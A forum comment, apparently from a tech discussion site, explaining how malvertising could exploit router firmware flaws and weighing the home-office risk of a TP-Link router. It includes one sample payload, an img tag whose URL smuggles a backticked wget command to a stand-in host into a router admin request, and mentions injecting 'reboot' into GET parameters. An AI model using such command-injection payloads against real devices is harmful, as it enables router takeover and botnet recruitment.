[jeroenhd]

It depends. If there's a vulnerability in the firmware that allows unauthenticated code execution from a generic GET request, malvertising on your computer could load an IMG tag with the SRC set to your router's IP and deploy malware to your router. From there your router could become part of a botnet, the router's DNS settings could be changed to redirect websites through some malvertising DNS server, and whatever the router can access in your network (dev database server?) could be extracted. Sometimes all it takes is an <img src="http://10.1.1.1/admin/getSettings?command=`wget http://ev.il/|curl`" /> in an ad.

Such vulnerabilities are more common than most vendors would like to admit. Adding `reboot` to random GET requests gets you quite far with quite a lot of consumer routers. I have little experience with TP Link software outside of flashing OpenWRT on their hardware.

There's been already scanners that target specific ISP routers for specific ISPs in specific countries already. In practice the probability of getting hit like this is very low, but the risk is still there.

With four years of updates, TP Link might actually care enough about security to not allow trivial exploits to execute code on their routers. Many vendors I know won't update past a year or two. I'd say the risk is low to very low in practice, but I'd watch out with running sensitive services (if you're in a healthcare startup, for example) while working from home.